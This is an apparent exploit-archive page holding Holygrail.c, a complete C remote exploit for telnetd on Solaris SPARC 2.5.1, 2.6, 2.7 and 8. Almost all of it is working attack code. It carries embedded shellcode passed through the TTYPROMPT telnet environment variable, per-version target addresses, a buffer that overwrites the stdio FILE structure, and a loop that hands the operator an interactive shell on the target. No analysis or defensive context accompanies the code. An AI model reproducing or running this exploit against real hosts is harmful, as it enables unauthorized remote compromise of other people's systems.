Holygrail.c

Свойства

Дата публикации:
27.08.2002

Код

Holygrail.c - remote exploit для telnetd в Solaris Sparc 2.5.1, 2.6, 2.7, и  8.


#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/telnet.h>

#ifdef SOLARIS
typedef unsigned long u_int32_t;
#endif

#define BUFLEN 1024

char shellcode[]=
"\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xdc\xda\xe0\x3b\xbf\xf0"
"\x90\x23\xa0\x10\x94\x23\x80\x0e\xd0\x23\xbf\xe0\xd4\x23\xbf\xe4"
"\x92\x23\xa0\x20\x82\x12\xa0\x3b\x91\xd0\x20\x08";

struct {
    char *name;
    unsigned long in_addr;
    unsigned long out_addr;
} targets[] = {
    { "Solaris 8/SPARC local proof of concept", 0xff1bd538,
0xff1b7028 },
    { "Solaris 2.7/SPARC local proof of concept", 0xff1bb23c,
0xff1b4a44 },
    { "Solaris 2.6/SPARC local proof of concept", 0xff6a91f0,
0xef6a323c },
    { "Solaris 2.5.1/SPARC local proof of concept", 0xff61bfe8,
0xef615144 },
    { "Solaris 2.7/SPARC remote darkside shit", 0xff1bb150,
0xff1b4c90 },
    { "Solaris 2.7/SPARC remote darkside shit II", 0xff1b4cc0,
0xff1b4c90 },
    { "Solaris 2.7/SPARC remote darkside shit III", 0xff1b5950,
0xff1b5920 },
    { "Solaris 8/SPARC remote darkside shit", 0xff1bd44c, 0xff1b7247
},
    { "Solaris 8/SPARC remote darkside shit II", 0xff1b9480,
0xff1b9450 },
    { NULL, 0 }
};

void usage(char *p)
{
    int i;

    fprintf(stderr, "usage: %s [-t type] [-p port] [-o offset]
<host>\n", p);
    fprintf(stderr, "-t: target type (see below)\n");
    fprintf(stderr, "-p: port to use (default: 23)\n");
    fprintf(stderr, "-o: offset to use (default: 0)\n\n");
    
    fprintf(stderr, "Target Types:\n");
    for(i = 0; targets[i].name; i++)
        fprintf(stderr, "%d) %s %.8x %.8x\n", i, targets[i].name,
targets[i].in_addr, targets[i].out_addr);
  
    fprintf(stderr, "\n");
    exit(0);
}

void die(char *msg)
{
    perror(msg);
    exit(errno);
}

u_int32_t get_ip(char *host)
{
    struct hostent *hp;
    
    if(!(hp = gethostbyname(host))){
        fprintf(stderr, "cannot resolve %s\n", host);
        return(0);
    }
    return(*(u_int32_t *)hp->h_addr_list[0]);
}

int get_socket(char *target, int port)
{
    int sock;
    u_int32_t ip;
    struct sockaddr_in sin;

    if(!(ip = get_ip(target)))
        return(0);
    
    bzero(&sin, sizeof(sin));
    sin.sin_family = AF_INET;
    sin.sin_port = htons(port);
    sin.sin_addr.s_addr = ip;
    
    if(!(sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
        die("socket");
    if(connect(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0)
        die("connect");
    return(sock);
}

void send_wont(int sock, int option)
{
    char buf[3], *ptr=buf;
    
    *ptr++ = IAC;
    *ptr++ = WONT;
    *ptr++ = (unsigned char)option;
    if(write(sock, buf, 3) < 0)
        die("write");
    return;
}

void send_will(int sock, int option)
{
    char buf[3], *ptr=buf;

    *ptr++ = IAC;
    *ptr++ = WILL;
    *ptr++ = (unsigned char)option;
    if(write(sock, buf, 3) < 0)
        die("write");
    return;
}

void send_do(int sock, int option)
{
    char buf[3], *ptr=buf;

    *ptr++ = IAC;
    *ptr++ = DO;
    *ptr++ = (unsigned char)option;
    if(write(sock, buf, 3) < 0)
        die("write");
    return;
}

void send_env(int sock, char *name, char *value)
{
    char buf[BUFLEN], *ptr = buf;
    
    *ptr++ = IAC;
    *ptr++ = SB;
    *ptr++ = TELOPT_NEW_ENVIRON;
    *ptr++ = TELQUAL_IS;
    *ptr++ = NEW_ENV_VAR;
    strncpy(ptr, name, BUFLEN-20);
    ptr += strlen(ptr);
    *ptr++ = NEW_ENV_VALUE;
    strncpy(ptr, value, (&buf[BUFLEN-1] - ptr)-1);
    ptr += strlen(ptr);
    *ptr++ = IAC;
    *ptr++ = SE;
    
    if(write(sock, buf, (ptr - buf)) < 0)
        die("write");
    return;
}

void do_negotiate(int sock)
{
    send_wont(sock, TELOPT_TTYPE);
    send_wont(sock, TELOPT_NAWS);
    send_wont(sock, TELOPT_LFLOW);
    send_wont(sock, TELOPT_LINEMODE);
    send_wont(sock, TELOPT_XDISPLOC);
    send_will(sock, TELOPT_LFLOW);
    send_will(sock, TELOPT_LINEMODE);
    send_wont(sock, TELOPT_OLD_ENVIRON);
    send_will(sock, TELOPT_NEW_ENVIRON);
    send_will(sock, TELOPT_BINARY);
    send_env(sock, "TTYPROMPT", shellcode);
    return;
}

void write_attack_buf(int sock, int type)
{
    char *attack_buf, *outbuf;
    int i, j;
#ifdef SOLARIS
    char tmpbuf[64];
#endif

    if(!(attack_buf = (char *)calloc(BUFLEN*3, 1)))
        die("malloc");
    if(!(outbuf = (char *)calloc(BUFLEN*6, 1))){
        free(attack_buf);
        die("malloc");
    }
    if(write(sock, attack_buf, strlen(attack_buf)) < 0)
        die("write");

    memset(attack_buf+100, '\t', 80);

    /* --- stdio FILE structure, top of _iob -- */

#ifdef SOLARIS

    *(long *)&tmpbuf[0] = htonl((unsigned long)0x00000000);
    *(long *)&tmpbuf[4] = htonl((unsigned
long)targets[type].in_addr);
    *(long *)&tmpbuf[8] = htonl((unsigned
long)targets[type].in_addr);
    *(long *)&tmpbuf[12] = htonl((unsigned long)0x05000000);

    *(long *)&tmpbuf[16] = htonl((unsigned long)0x00000001);
    *(long *)&tmpbuf[20] = htonl((unsigned
long)targets[type].out_addr);
    *(long *)&tmpbuf[24] = htonl((unsigned
long)targets[type].out_addr);
    *(long *)&tmpbuf[28] = htonl((unsigned long)0x4201000a);

    memcpy(&attack_buf[2055], tmpbuf, 32);
#else

    *(long *)&attack_buf[2055] = htonl((unsigned long)0x00000000);
    *(long *)&attack_buf[2059] = htonl((unsigned
long)targets[type].in_addr);
    *(long *)&attack_buf[2063] = htonl((unsigned
long)targets[type].in_addr);
    *(long *)&attack_buf[2067] = htonl((unsigned long)0x05000000);

    *(long *)&attack_buf[2071] = htonl((unsigned long)0x00000001);
    *(long *)&attack_buf[2075] = htonl((unsigned
long)targets[type].out_addr);
    *(long *)&attack_buf[2079] = htonl((unsigned
long)targets[type].out_addr);
    *(long *)&attack_buf[2083] = htonl((unsigned long)0x4201000a);

#endif
    /* -- IAC stuffing, so telnetd doesn't decide to negotiate -- */
    for(i = 0, j = 0; i < 3000; i++){
        outbuf[j++] = attack_buf[i];
        if(attack_buf[i] == '\xff')
            outbuf[j++] = '\xff';
        if(attack_buf[i] == '\n')
            break;
    }
    
    if(write(sock, outbuf, j) < 0)
        die("write");
    
    /* -- 2 reads for reading the garbage which screws up term -- */
    if((j = read(sock, attack_buf, BUFLEN)) < 0)
        die("read");
    if((j = read(sock, attack_buf, BUFLEN)) < 0)
        die("read");
    
    free(attack_buf);
    free(outbuf);
    return;
}

int main(int argc, char **argv)
{
    int c, n, sockfd, type = 0, offset=0, port = 23;
    char buf[2048], *shellstr="cd /; id; pwd; uname -a;\r\n";
    fd_set rset;

    while((c = getopt(argc, argv, "t:o:p:")) != EOF){
        switch(c){
            case 't':
                type = atoi(optarg);
                if(type < 0 || type > sizeof(targets)){
                    fprintf(stderr, "invalid target type\n");
                    usage(argv[0]);
                }
            case 'o':
                offset = atoi(optarg);
                break;
            case 'p':
                port = atoi(optarg);
                break;
        }
    }
    
    if(!argv[optind] || !*argv[optind])
        usage(argv[0]);
    if(!(sockfd = get_socket(argv[optind], port)))
        exit(-1);
    do_negotiate(sockfd);

    n = read(sockfd, buf, sizeof(buf));
    write_attack_buf(sockfd, type);
    send_wont(sockfd, TELOPT_BINARY);
    sleep(1);
    read(sockfd, buf, sizeof(buf));
    write(sockfd, shellstr, strlen(shellstr));

    FD_ZERO(&rset);
    for(;;){
        FD_SET(0, &rset);
        FD_SET(sockfd, &rset);
        if(select(sockfd+1, &rset, NULL, NULL, NULL) < 0)
            die("select");
        
        if(FD_ISSET(sockfd, &rset)){
            bzero(buf, sizeof(buf));
            if((n = read(sockfd, buf, sizeof(buf))) < 0)
                die("read");
            if(n == 0){
                printf("EOF\n");
                exit(0);
            }
            write(1, buf, n);
        }
        
        if(FD_ISSET(0, &rset)){
            bzero(buf, sizeof(buf));
            if((n = read(0, buf, sizeof(buf))) < 0)
                die("read");
            if(n == 0)
                exit(0);
            write(sockfd, buf, n);
        }
    }
}


или введите имя

CAPTCHA